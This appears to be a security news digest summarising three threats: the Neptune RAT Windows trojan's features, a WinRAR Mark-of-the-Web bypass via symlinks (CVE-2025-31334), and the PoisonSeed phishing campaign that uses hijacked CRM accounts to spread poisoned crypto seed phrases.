Neptune RAT: Emerging Threat with Deep System Access and Persistent Capabilities
Neptune RAT is a newly identified Remote Access Trojan targeting Windows systems, engineered in Visual Basic .NET and distributed across platforms including GitHub, Telegram, and YouTube. It is promoted as a premium tool for cybercriminals, although it’s only available as an obfuscated executable without source code, making it difficult for analysts to dissect. Once deployed, it abuses PowerShell commands, including 'Invoke-RestMethod' and 'Invoke-Expression' to download and execute hidden payloads from external sources, often hosted on content-sharing platforms. These files are dropped into the AppData\Roaming directory, where the malware copies itself and registers for startup via Windows Registry modifications. Neptune RAT’s core functionality includes harvesting credentials from over 270 software applications, altering copied cryptocurrency wallet addresses, deploying ransomware, monitoring the desktop in real-time, and manipulating critical system functions. It can also rewrite the Master Boot Record, effectively bricking the system, and disable antivirus software to maintain control without interruption. The malware ensures persistence by setting hidden scheduled tasks using schtasks.exe and adding keys to the Windows Registry Run path. Neptune RAT includes built-in detection for virtual machines, checking system properties to determine if it’s being analyzed, and terminating its operations if found. Its ransomware component encrypts files and appends a “[.]ENC” extension, while ransom instructions are dropped as an HTML file on the desktop. The malware's developers have created a GUI builder to customize builds and are actively marketing enhanced paid versions, with indications of ties to organized underground groups. Neptune RAT’s combination of stealth, destructive capability, and data theft makes it a growing concern in the malware landscape.
WinRAR CVE-2025-31334: MotW Bypass Enables Silent Code Execution via Symlinks
A newly disclosed vulnerability, CVE-2025-31334, impacts all versions of WinRAR before 7.11 and allows threat actors to bypass Windows' Mark of the Web (MotW) warnings. MotW is a native Windows security feature that flags files downloaded from the internet with metadata to alert users before opening potentially unsafe content. This flaw involves symbolic links (symlinks) created within a RAR archive. If a user opens a symlink from the WinRAR interface that points to an executable file, the MotW tag is ignored, and the file runs without warning. The attacker must have administrative privileges to create the symlink on a victim’s system, but once deployed, it enables silent execution of arbitrary code without triggering the usual security prompt. This issue has been resolved in WinRAR version 7.11, which now enforces MotW metadata when launching executables through symlinks. Although the vulnerability holds a medium severity score of 6.8, its potential for abuse is significant, especially considering past exploitation patterns. MotW bypasses have been a common tactic in malware delivery chains used by advanced threat actors, including state-sponsored groups. In a recent example, Russian hackers abused a MotW bypass in 7-Zip through double archiving to distribute Smokeloader without detection. This new WinRAR flaw could enable similar attack vectors unless users update immediately. It was responsibly reported by Shimamine Taihei through Japan’s Information Technology Promotion Agency, with coordination from the national CSIRT. Since version 7.10, WinRAR has also introduced options to strip potentially sensitive MotW data like download URLs or IP addresses, which—while addressing privacy—could further open the door to abuse if misunderstood or misused. This latest disclosure underscores the ongoing risk posed by improperly handled MotW metadata in file archiving utilities.
PoisonSeed: Phishing Campaign Hijacks CRM Accounts to Steal Cryptocurrency
PoisonSeed is an ongoing phishing campaign targeting individuals and organizations by compromising accounts tied to major CRM and bulk email services. The attackers begin by identifying high-value targets with access to platforms like Mailchimp, SendGrid, HubSpot, Mailgun, and Zoho, often through spoofed login pages designed to resemble legitimate services. Once they gain access, they create new API keys to retain control, even if the original account owners reset their passwords. The attackers then export mailing lists and use the hijacked accounts to send crypto-themed phishing emails to thousands of users. These emails impersonate legitimate services, typically Coinbase or Ledger, instructing recipients to set up a new wallet using a provided seed phrase. Using that seed, victims unknowingly connect to a wallet under the attacker’s control, enabling them to siphon any transferred funds immediately. The poisoned seed phrase trick is designed to look like a legitimate migration or upgrade, making it appear urgent and trustworthy. Attackers sometimes use domain names like mailchimp-sso[.]com to lend credibility to their phishing emails. Despite similarities, Silent Push analysts note that the phishing kit used here is unique, which suggests a separate actor or an evolved toolset. The broader ecosystem behind these attacks, often called "The Com," continues to blend social engineering and technical abuse of trusted marketing infrastructure. The most effective countermeasure is awareness—users should never use pre-written seed phrases from an email and should independently verify any platform-related requests by logging in through official channels.
